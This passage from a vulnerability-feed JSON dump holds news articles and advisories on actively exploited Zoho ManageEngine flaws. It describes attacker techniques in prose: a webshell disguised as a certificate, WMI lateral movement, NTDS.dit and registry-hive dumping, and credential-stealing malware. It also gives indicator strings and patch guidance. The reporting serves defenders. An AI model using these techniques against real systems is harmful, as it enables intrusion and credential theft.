It is, in other words, a powerful, highly privileged application which can act as a convenient point-of-entry to areas deep inside an enterprise\u2019s footprint, for both users and attackers alike.\n\nLast Tuesday, [Zoho issued a patch](<http://cve-2021-40539>) \u2013 [Zoho ManageEngine ADSelfService Plus build 6114](<https://pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-6114-security-fix-release>) \u2013 for the flaw, which is tracked as [CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>) with a 9.8 severity rating. As the Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus>) at the time, it was being actively exploited in the wild as a zero-day.\n\nAccording to today\u2019s [joint advisory](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) from the three government cybersecurity arms \u2013 FBI, CISA and CGCYBER \u2013 the exploits pose \u201ca serious risk to critical infrastructure companies, U.S.-cleared defense contractors, academic institutions, and other entities that use the software.\u201d\n\nYou can see why: Successful exploitation of a lynchpin piece of security like a SSO and password handler could lay out a welcome mat for adversaries. 
Specifically, as the advisory iterated, an adversary could use the vulnerability to pry open security defenses in order to compromise admin credentials, move laterally through the network, and exfiltrate registry hives and AD files.\n\nThat\u2019s of concern to any business, but with Zoho, we\u2019re talking about a security solution that\u2019s used by critical infrastructure companies, U.S.-cleared defense contractors and academic institutions, among others.\n\nThe joint advisory said that APT groups have in fact targeted such entities in multiple industries, including transportation, IT, manufacturing, communications, logistics and finance.\n\n\u201cIllicitly obtained access and information may disrupt company operations and subvert U.S. research in multiple sectors,\u201d the advisory noted. \u201cSuccessful exploitation of the vulnerability allows an attacker to place webshells, which enable the adversary to conduct post-exploitation activities, such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files.\u201d\n\n## Confirming Exploits May Be Tough\n\nSuccessful attacks have been uploading a .zip file containing a JavaServer Pages (JSP) webshell \u2013 accessible at /help/admin-guide/Reports/ReportGenerate.jsp \u2013 pretending to be an x509 certificate, service.cer. 
Next come requests to different API endpoints to further exploit the targeted system.\n\nThe next step in the exploit is lateral movement using Windows Management Instrumentation (WMI), gaining access to a domain controller, dumping of NTDS.dit and SECURITY/SYSTEM registry hives, and then, from there, further compromised access.\n\n\u201cConfirming a successful compromise of ManageEngine ADSelfService Plus may be difficult,\u201d the security agencies advised, given that the attackers are running clean-up scripts designed to rub out their tracks by removing traces of the initial point of compromise and by obscuring any relationship between the exploitation of CVE-2021-40539 and the webshell.\n\nThe advisory provided this laundry list of tactics, techniques and processes (TTP) being used by threat actors to exploit the vulnerability:\n\n * WMI for lateral movement and remote code execution (wmic.exe)\n * Using plaintext credentials acquired from compromised ADSelfService Plus host\n * Using pg_dump.exe to dump ManageEngine databases\n * Dumping NTDS.dit and SECURITY/SYSTEM/NTUSER registry hives\n * Exfiltration through webshells\n * Post-exploitation activity conducted with compromised U.S. infrastructure\n * Deleting specific, filtered log lines\n\n## Mitigations\n\nOrganizations that detect indicators of compromise (IoC) around their ManageEngine ADSelfService Plus installations \u201cshould take action immediately,\u201d the trio of agencies instructed.\n\n\u201cFBI, CISA, and CGCYBER strongly urge users and administrators to update to ADSelfService Plus build 6114,\u201d the trio stated. 
They also strongly urged organizations to keep ADSelfService Plus away from direct access via the internet.\n\nThey\u2019re also strongly recommending domain-wide password resets and double Kerberos Ticket Granting Ticket (TGT) password resets \u201cif any indication is found that the NTDS.dit file was compromised.\u201d\n\n## This One Will Hurt\n\nJake Williams, co-founder and CTO at incident response firm BreachQuest, said that organizations should take note of the fact that threat actors have been using webshells as a post-exploitation payload. In the case of the exploitation of this Zoho flaw, they\u2019re using webshells disguised as certificates: something that security teams should be able to pick up on in web server logs, but \u201conly if organizations have a plan for detection.\u201d\n\nNo time like the present to start, he told Threatpost on Thursday: \u201cGiven that this will certainly not be the last vulnerability that results in web shell deployment, organizations are advised to baseline normal behavior in their web server logs so they can quickly discover when a web shell has been deployed.\u201d\n\nFinding a critical vulnerability in the system intended to help your employees manage and reset their passwords is \u201cexactly as bad as it sounds,\u201d noted Oliver Tavakoli, CTO at cybersecurity firm Vectra. \u201cEven if the ADSelfService Plus server was not accessible from the internet, it would be accessible from any compromised laptop. Recovery will be expensive \u2013 \u2018domain-wide password resets and double Kerberos Ticket Granting Ticket (TGT) password resets\u2019 are certainly disruptive by themselves, and the APT groups may have established other means of persistence in the intervening time.\u201d\n\nThis ManageEngine vulnerability is the fifth instance of similarly critical vulnerabilities from ManageEngine this year, noted Sean Nikkel, senior cyber threat intel analyst at digital risk protection provider Digital Shadows. 
Unfortunately but predictably, given how much access attackers can get out of exploiting a vulnerability like this, we can likely expect more widespread exploitation of this and previous bugs, \u201cgiven the interactivity with Microsoft system processes.\u201d\n\nNikkel continued with yet another gloomy prediction: \u201cThe observation that APT groups are actively exploiting CVE-2021-40539 should highlight the potential exposure it might cause. If trends are consistent, extortion groups will likely seek exploitation for ransomware activity in the not-so-distant future,\u201d he mused.\n\nAll of which points to what CISA et al. have been urging about these vulnerabilities: namely, patch fast. \u201cUsers of Zoho\u2019s software should apply patches immediately to avoid the types of compromise described in the CISA bulletin,\u201d Nikkel said.\n\n## See Something, Say Something\n\nOrganizations should immediately report any of the following to [CISA](<https://us-cert.cisa.gov/report>) or the FBI:\n\n * Identification of IoC as outlined in the advisory.\n * Presence of webshell code on compromised ManageEngine ADSelfService Plus servers.\n * Unauthorized access to or use of accounts.\n * Evidence of lateral movement by malicious actors with access to compromised systems.\n * Other indicators of unauthorized access or compromise.\n\nHere are the reporting instructions:\n\n * Contact your local FBI field office at <https://www.fbi.gov/contact-us/field-offices>, or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at CyWatch@fbi.gov. 
When available, include the incident date, time and location; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.\n * To request incident response resources or technical assistance related to these threats, contact CISA at Central@cisa.gov.\n * To report cyber incidents to the Coast Guard contact the USCG National Response Center (NRC). Phone: 1-800-424-8802, email: NRC@uscg.mil.\n\n**Rule #1 of Linux Security: **No cybersecurity solution is viable if you don\u2019t have the basics down. [**JOIN**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the [**4 Golden Rules of Linux Security**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>). Your top takeaway will be a Linux roadmap to getting the basics right! [**REGISTER NOW**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) and join the **LIVE event on Sept. 29 at Noon EST**. 
Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time.\n", "cvss3": {}, "published": "2021-09-16T21:09:23", "type": "threatpost", "title": "CISA, FBI: State-Backed APTs Are Exploiting Critical Zoho Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40539"], "modified": "2021-09-16T21:09:23", "id": "THREATPOST:1606F3DA3AAD368249E36D32FC2B8079", "href": "https://threatpost.com/cisa-fbi-state-backed-apts-exploit-critical-zoho-bug/174768/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-09T14:12:34", "description": "A new campaign is prying apart a known security vulnerability in the Zoho ManageEngine ADSelfService Plus password manager, researchers warned over the weekend. The threat actors have managed to exploit the Zoho weakness in at least nine global entities across critical sectors so far (technology, defense, healthcare, energy and education), deploying the Godzilla webshell and exfiltrating data.\n\nOn Sunday, Palo Alto Network\u2019s Unit 42 researchers [said](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>) that the targeted cyberespionage campaign is distinct from the ones that the FBI and [CISA warned about](<https://threatpost.com/cisa-fbi-state-backed-apts-exploit-critical-zoho-bug/174768/>) in September.\n\nThe bug is a critical authentication bypass flaw \u2013 CVE-2021-40539 \u2013 that allows unauthenticated remote code execution (RCE). 
Zoho [patched](<https://threatpost.com/zoho-password-manager-zero-day-attack/169303/>) the vulnerability in September, but it\u2019s been actively exploited in the wild starting at least as early as August when it was a zero-day, opening the corporate doors to attackers who can run amok as they get free rein across users\u2019 Active Directory (AD) and cloud accounts.\n\nConsequences of a successful exploit can be significant: The Zoho ManageEngine ADSelfService Plus is a self-service password management and single sign-on (SSO) platform for AD and cloud apps, meaning that any cyberattacker able to take control of the platform would have multiple pivot points into both mission-critical apps (and their sensitive data) and other parts of the corporate network via AD. It is, in other words, a powerful, highly privileged application that can act as a convenient point-of-entry to areas deep inside an enterprise\u2019s footprint, for both users and attackers alike.\n\nCISA\u2019s alert explained that in the earlier attacks, state-backed, advanced persistent threats (APTs) were deploying a specific webshell and other techniques to maintain persistence in victim environments.\n\nNine days after the CISA alert, Unit 42 researchers saw yet another, unrelated campaign kick off starting on Sept. 17, as a different actor started scanning for unpatched servers. On Sept. 22, after five days of harvesting data on potential targets, exploitation attempts started up and likely continued into early October.\n\nUnit 42 researchers believe that the actor more or less indiscriminately targeted unpatched servers across the spectrum, from education to the Department of Defense, with scans of at least 370 Zoho ManageEngine servers in the U.S. 
alone.\n\n\u201cWhile we lack insight into the totality of organizations that were exploited during this campaign, we believe that, globally, at least nine entities across the technology, defense, healthcare, energy and education industries were compromised,\u201d they said.\n\n## Godzilla Webshell Does Some Heavy Lifting\n\nUnit 42 said that after threat actors exploited [CVE-2021-40539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539>) to gain RCE, they quickly moved laterally to deploy several pieces of malware, relying particularly on the publicly available Godzilla webshell.\n\nThe actor uploaded several Godzilla variations to compromised servers and planted some new malware tools as well, including a custom Golang-based open-source backdoor called [NGLite](<https://github.com/Maka8ka/NGLite>) and a new credential-stealer that Unit 42 is tracking as KdcSponge.\n\n\u201cThe threat actors then used either the webshell or the NGLite payload to run commands and move laterally to other systems on the network, while they exfiltrated files of interest simply by downloading them from the web server,\u201d according to the analysis. After the actors pivoted to a domain controller, they installed the new KdcSponge stealer, which is designed to harvest usernames and passwords from domain controllers as accounts attempt to authenticate to the domain via Kerberos.\n\nBoth Godzilla and NGLite are written in Chinese and are free for the taking on GitHub.\n\n\u201cWe believe threat actors deployed these tools in combination as a form of redundancy to maintain access to high-interest networks,\u201d Unit 42 surmised. 
The researchers described Godzilla as something of a multi-function pocket knife of a webshell, noting that it \u201cparses inbound HTTP POST requests, decrypts the data with a secret key, executes decrypted content to carry out additional functionality and returns the result via a HTTP response.\u201d\n\nAs such, attackers can avoid placing code that\u2019s likely to be flagged as malicious on targeted systems until they\u2019re ready to dynamically execute it, researchers said.\n\n## Using NKN to Communicate Is an Eye-Opener\n\n\u201cNGLite is characterized by its author as an \u2018anonymous cross-platform remote control program based on blockchain technology,\u2019\u201d Unit 42 researchers Robert Falcone, Jeff White and Peter Renals explained. \u201cIt leverages New Kind of Network ([NKN](<https://nkn.org/>)) infrastructure for its command and control (C2) communications, which theoretically results in anonymity for its users.\u201d\n\nThe researchers noted that using NKN \u2013 a legitimate networking service that uses blockchain technology to support a decentralized network of peers \u2013 for a C2 channel is \u201cvery uncommon.\u201d\n\n\u201cWe have seen only 13 samples communicating with NKN altogether \u2013 nine NGLite samples and four related to a legitimate open-source utility called [Surge](<https://github.com/rule110-io/surge>) that uses NKN for file sharing.\u201d\n\n## Threat Actor Shares TTPs with Emissary Panda\n\nUnit 42 said the identity of the threat actor is unclear, but researchers saw [correlations in tactics and tooling](<https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage>) between this attacker and Threat Group 3390 (aka [Emissary Panda](<https://threatpost.com/ransomware-major-gaming-companies-apt27/162735/>), APT27, Bronze Union and LuckyMouse), an APT that\u2019s been around since 2013 and which [is believed to operate from 
China](<https://threatpost.com/bronze-union-apt-updates-remote-access-trojans-in-fresh-wave-of-attacks/142219/>).\n\n\u201cSpecifically, as documented by SecureWorks in an article on a [previous TG-3390 operation](<https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage>), we can see that TG-3390 similarly used web exploitation and another popular Chinese webshell called [ChinaChopper](<https://threatpost.com/deadringer-targeted-exchange-servers-before-discovery/168300/>) for their initial footholds before leveraging legitimate stolen credentials for lateral movement and attacks on a domain controller,\u201d Unit 42 said. \u201cWhile the webshells and exploits differ, once the actors achieved access into the environment, we noted an overlap in some of their exfiltration tooling.\u201d\n\n110921 08:51 UPDATE: [Microsoft said](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>) on Monday that it\u2019s attributing this campaign with high confidence to DEV-0322, a group operating out of China, \u201cbased on observed infrastructure, victimology, tactics, and procedures.\u201d\n\nMicrosoft\u2019s Threat Intelligence Center (MSTIC) has previously detected DEV-0322 taking part in attacks targeting the SolarWinds Serv-U software, which had a zero day \u2013 CVE-2021-35211, a remote memory escape \u2013 that SolarWinds [patched](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) in July.\n\nMSTIC researchers said that the attacks in this new round of beating up Zoho password manager are installing a custom IIS module. 
IIS, or Internet Information Services, is an extensible web server software created by Microsoft for use with the Windows NT family.\n\nBesides the custom IIS module, DEV-0322 also deployed a trojan that MSTIC is calling Trojan:Win64/Zebracon that uses hardcoded credentials to make connections to suspected DEV-0322-compromised [Zimbra email servers.](<https://threatpost.com/zimbra-server-bugs-email-plundering/168188/>)\n\nIn its Sept. 16 alert, CISA recommended that organizations that spot indicators of compromise related to ManageEngine ADSelfService Plus should \u201ctake action immediately.\u201d\n\nAlso, CISA strongly recommended domain-wide password resets and double Kerberos Ticket Granting Ticket (TGT) password resets, \u201cif any indication is found that the NTDS.dit file was compromised.\u201d\n\n## Classic Cyberespionage Targets: Healthcare and Energy\n\nIf the actor behind this second Zoho-focused campaign does turn out to be a Chinese APT, it won\u2019t be surprising, some said. Dave Klein, cyber evangelist and director at [Cymulate](<https://cymulate.com/>), pointed to the People\u2019s Republic of China (PRC) having a well-documented, continued interest in healthcare and energy infrastructure data.\n\nHe pointed to the [2015 breach](<https://threatpost.com/5-6-million-fingerprints-stolen-in-opm-hack/114784/>) of the U.S. Office of Personnel Management (OPM) as an example. The massive breach was overwhelmingly [attributed](<https://www.washingtonpost.com/world/national-security/chinese-hackers-breach-federal-governments-personnel-office/2015/06/04/889c0e52-0af7-11e5-95fd-d580f1c5d44e_story.html?hpid=z1>) to the PRC. 
It exposed exquisitely sensitive information, including millions of federal employees\u2019 fingerprints, Social Security numbers, dates of birth, employee performance records, employment history, employment benefits, resumes, school transcripts, military service documentation and psychological data from interviews conducted by background investigators.\n\n\u201cThe PRC got into clearance background information data including very sensitive information. Subsequently in that case they were looking for weaknesses in US classified personnel \u2013 which would include health hardships \u2013 either personally or related to them,\u201d Klein told Threatpost via email on Monday.\n\nHe noted that following the OPM breach, some healthcare agencies were breached as well, including [Anthem Health](<https://threatpost.com/chinese-hackers-anthem-data-breach-indicted/144572/>): an attack that affected more than 78 million people. \u201cThe interest in healthcare data globally continues not only for espionage purposes against targets \u2013 building an inventory of hardships/weak points as well as seeking out healthcare data to better serve their local industries,\u201d Klein noted. \u201cOn energy, the interest is both on stealing industrial espionage information as well as to set up compromises in critical infrastructures for potential use in cases of future hostilities.\u201d\n\n## If Patching Isn\u2019t Mandatory, a Breach Is a Given\n\nMike Denapoli, lead security architect at Cymulate, added that well-documented (and patched) vulnerabilities in massively popular platforms like Microsoft Exchange and ManageEngine are ripe fruit for threat actors to pluck. 
Organizations that can\u2019t or won\u2019t patch are sitting ducks, he said.\n\n\u201cFor whatever the reasons may be (downtime avoidance, fear over patches disrupting workflows, etc.), attackers know these systems are vulnerable, and are making sure to take advantage of any organization that doesn\u2019t keep patching updated,\u201d Denapoli told Threatpost. \u201cWe have reached the point where patching is a must \u2013 within a reasonable amount of time \u2013 and needs to be performed. While you don\u2019t have to patch immediately, you must patch regularly. Downtime is mandatory. Testing is mandatory. If not, then a breach is mandatory.\u201d\n\n_Image courtesy of [AlphaCoders](<https://wall.alphacoders.com/big.php?i=1012166>)._\n\n110821 12:24 UPDATE: Added input from Mike Denapoli and Dave Klein.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-08T16:38:05", "type": "threatpost", 
"title": "Zoho Password Manager Flaw Torched by Godzilla Webshell, New Data Stealer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211", "CVE-2021-40539"], "modified": "2021-11-08T16:38:05", "id": "THREATPOST:BC99709891AA93FC7767B53445FC2736", "href": "https://threatpost.com/zoho-password-manager-flaw-godzilla-webshell/176063/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-09T15:34:54", "description": "A critical security vulnerability in the Zoho ManageEngine ADSelfService Plus platform could allow remote attackers to bypass authentication and have free rein across users\u2019 Active Directory (AD) and cloud accounts.\n\nThe issue (CVE-2021-40539) has been actively exploited in the wild as a zero-day, according to the Cybersecurity and Infrastructure Security Agency (CISA).\n\nZoho issued a patch on Tuesday, and CISA [warned that](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus>) admins should not only apply it immediately, but also ensure in general that ADSelfService Plus is not directly accessible from the internet. 
The issue affects builds 6113 and below (the fixed version is 6114).\n\nThe Zoho ManageEngine ADSelfService Plus is a self-service password management and single sign-on (SSO) solution for AD and cloud apps, meaning that any cyberattacker able to take control of the platform would have multiple pivot points into both mission-critical apps (and their sensitive data) and other parts of the corporate network via AD. It is, in other words, a powerful, highly privileged application that can act as a convenient point-of-entry to areas deep inside an enterprise\u2019s footprint, for both users and attackers alike.\n\n\u201cUltimately, this underscores the threat posed to internet-facing applications,\u201d Matt Dahl, principal intelligence analyst for CrowdStrike, [noted](<https://twitter.com/voodoodahl1/status/1435673342925737991>). \u201cThese don\u2019t always get the same attention as exploit docs with decoy content, but the variety of these web-facing services gives actors lots of options.\u201d\n\nThis isn\u2019t Zoho\u2019s first zero-day rodeo. In March 2020, [researchers disclosed](<https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/>) a zero-day vulnerability in Zoho\u2019s ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones and more from a central location. 
The critical bug ([CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>), with a CVSS score of 9.8) allowed an unauthenticated, remote attacker to gain complete control over affected systems \u2013 \u201cbasically the worst it gets,\u201d researchers said at the time.\n\n## **Authentication Bypass and RCE**\n\nThe issue at hand is an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus, which could lead to remote code execution (RCE), according to Zoho\u2019s [knowledge-base advisory](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>).\n\n\u201cThis vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request,\u201d according to the firm. \u201cThis would allow the attacker to carry out subsequent attacks resulting in RCE.\u201d\n\nEchoing CISA\u2019s assessment, Zoho also noted that \u201cWe are noticing indications of this vulnerability being exploited.\u201d The firm characterized the issue as \u201ccritical\u201d although a CVSS vulnerability-severity rating has not yet been calculated for the bug.\n\nFurther technical details are for now scant (and no public exploit code appears to be making the rounds \u2014 yet), but Dahl noted that the zero-day attacks have been going on for quite some time:\n\n> Observed exploitation of this vuln _before_ CVE-2021-26084 (Atlassian Confluence) which got a lot of attention last week. 
Some very general observations:\n> \n> 1/ <https://t.co/rIfxxeBlmO>\n> \n> \u2014 Matt Dahl (@voodoodahl1) [September 8, 2021](<https://twitter.com/voodoodahl1/status/1435673338693754886?ref_src=twsrc%5Etfw>)\n\nHowever, he said that the attacks have thus far been highly targeted and limited, and possibly the work of a single (unknown, for now) actor.\n\n\u201cActor(s) appeared to have a clear objective with ability to get in and get out quickly,\u201d he tweeted.\n\nHe also noted similarities to the attacks taking place on Atlassian Confluence instances (CVE-2021-26084), which also started out as limited and targeted. However, in that case, researchers were able to \u201crapidly produce\u201d a PoC exploit, he pointed out, and eventually there was proliferation to multiple targeted-intrusion actors, usually resulting in cryptomining activity ([as seen in](<https://threatpost.com/jenkins-atlassian-confluence-cyberattacks/169249/>) the recent Jenkins attack).\n\nAtlassian Confluence, like ADSelfService Plus, allows centralized cloud access to a raft of sensitive corporate information, being a collaboration platform where business teams can organize their work in one place.\n\n## How to Know if Zoho ADSelfService Plus is Vulnerable\n\nUsers can tell if they\u2019ve been affected by taking a gander at the \\ManageEngine\\ADSelfService Plus\\logs folder to see if the following strings are found in the access log entries:\n\n * /RestAPI/LogonCustomization\n * /RestAPI/Connection\n\nZoho also said that users will find the following files in the ADSelfService Plus installation folder if running a vulnerable version:\n\n * cer in \\ManageEngine\\ADSelfService Plus\\bin folder.\n * jsp in \\ManageEngine\\ADSelfService Plus\\help\\admin-guide\\Reports folder.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T12:58:48", "type": "threatpost", "title": "Zoho ManageEngine Password Manager Zero-Day Gets Fix", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189", "CVE-2021-26084", 
"CVE-2021-40539"], "modified": "2021-09-09T12:58:48", "id": "THREATPOST:705B9DD7E8602B9F2F913955E25C2550", "href": "https://threatpost.com/zoho-password-manager-zero-day-attack/169303/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hivepro": [{"lastseen": "2022-01-24T21:31:26", "description": "THREAT LEVEL: Amber. For a detailed advisory, download the pdf file here. Zoho has patched a critical vulnerability (CVE-2021-44757) in Desktop Central and Desktop Central MSP, which are unified endpoint management (UEM) solutions. A security vulnerability exists in Desktop Central and Desktop Central MSP that allows a remote user to bypass the authentication mechanism. Successful exploitation of this issue may allow an attacker to read unauthorized data or write an arbitrary zip file on the server. Similar Zoho ManageEngine vulnerabilities were primarily targeted by many APT groups in 2021. Around 2,800 ManageEngine Desktop Central instances were found to be exposed in a Shodan search. Hive Pro researchers strongly recommend that affected customers upgrade to a fixed version before any exploitation occurs.\n\n#### Vulnerability Details\n\n#### Patch Link\n\n<https://pitstop.manageengine.com/portal/en/community/topic/a-critical-security-patch-released-in-desktop-central-and-desktop-central-msp-for-cve-2021-44757-17-1-2022>\n\n#### References\n\n<https://thehackernews.com/2022/01/high-severity-vulnerability-in-3.html>\n\n<https://securityaffairs.co/wordpress/126821/hacking/wordpress-plugins-flaws-2.html?utm_source=rss&utm_medium=rss&utm_campaign=wordpress-plugins-flaws-2>\n\n<https://www.bleepingcomputer.com/news/security/zoho-plugs-another-critical-security-hole-in-desktop-central/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-01-19T13:49:50", "type": "hivepro", "title": "Zoho ManageEngine Desktop Central affected by critical vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44757"], "modified": "2022-01-19T13:49:50", "id": "HIVEPRO:EBE89D6C841CF2A41508860258C415CD", "href": "https://www.hivepro.com/zoho-manageengine-desktop-central-affected-by-critical-vulnerability/", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-12-17T07:20:56", "description": "#### THREAT LEVEL: Red.\n\nFor a 
detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/11/Several-Zoho-ManageEngine-products-have-been-exploited_TA202154.pdf>)\n\nMultiple vulnerabilities have been discovered in Zoho ManageEngine products. The affected products include Zoho ManageEngine ServiceDesk Plus, Zoho ManageEngine SupportCenter Plus, Zoho ManageEngine Desktop Central and Zoho ManageEngine AssetExplorer. \nCVE-2021-44077 is a vulnerability that could allow an attacker to run arbitrary code. It was discovered on November 20, 2021. This vulnerability, however, may be easily fixed by updating to Zoho version 11306, which was released in September. Attackers are focusing on the healthcare, financial services, electronics, and IT consulting businesses by exploiting this vulnerability. \nCVE-2021-44515 and CVE-2021-44526 are authentication bypass vulnerabilities. CVE-2021-44515 only affects Zoho ManageEngine ServiceDesk and Zoho ManageEngine AssetExplorer installations that use the Desktop Central Agent for asset discovery, while CVE-2021-44526 affects all vulnerable versions of Zoho ManageEngine ServiceDesk and Zoho ManageEngine AssetExplorer. \nTwo of these vulnerabilities (CVE-2021-44077 and CVE-2021-44515) have been exploited in the wild, so organizations should upgrade their Zoho ManageEngine products to their latest versions to eliminate these vulnerabilities. 
\nThe techniques used by an unknown actor to exploit CVE-2021-44077 include: \n\n * T1190 - Exploit Public Facing Application \n * T1505.003 - Server Software Component: Web Shell \n * T1027 - Obfuscated Files or Information \n * T1140 - Deobfuscate/Decode Files or Information \n * T1003 - OS Credential Dumping \n * T1218 - Signed Binary Proxy Execution \n * T1136 - Create Account \n * T1003.003 - OS Credential Dumping: NTDS \n * T1047 - Windows Management Instrumentation \n * T1070.004 - Indicator Removal on Host: File Deletion \n * T1087.002 - Account Discovery: Domain Account \n * T1560.001 - Archive Collected Data: Archive via Utility \n * T1573.001 - Encrypted Channel: Symmetric Cryptography\n\n#### Vulnerability Details\n\n#### Indicators of Compromise (IoCs) *\n\n#### Patch Link\n\n<https://www.manageengine.com/desktop-management-msp/cve-2021-44515-security-advisory.html>\n\n<https://www.manageengine.com/products/service-desk/security-response-plan.html>\n\n<https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44526-and-cve-2021-44515-authentication-bypass-vulnerabilities-in-servicedesk-plus-and-desktop-central>\n\n<https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44526-and-cve-2021-44515-authentication-bypass-vulnerabilities-in-assetexplorer-and-desktop-central>\n\n#### References\n\n<https://us-cert.cisa.gov/ncas/alerts/aa21-336a>\n\n<https://www.bleepingcomputer.com/news/security/zoho-patch-new-manageengine-bug-exploited-in-attacks-asap/>\n\n<https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/>\n\n* Indicates parameters that apply to CVE-2021-44077", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
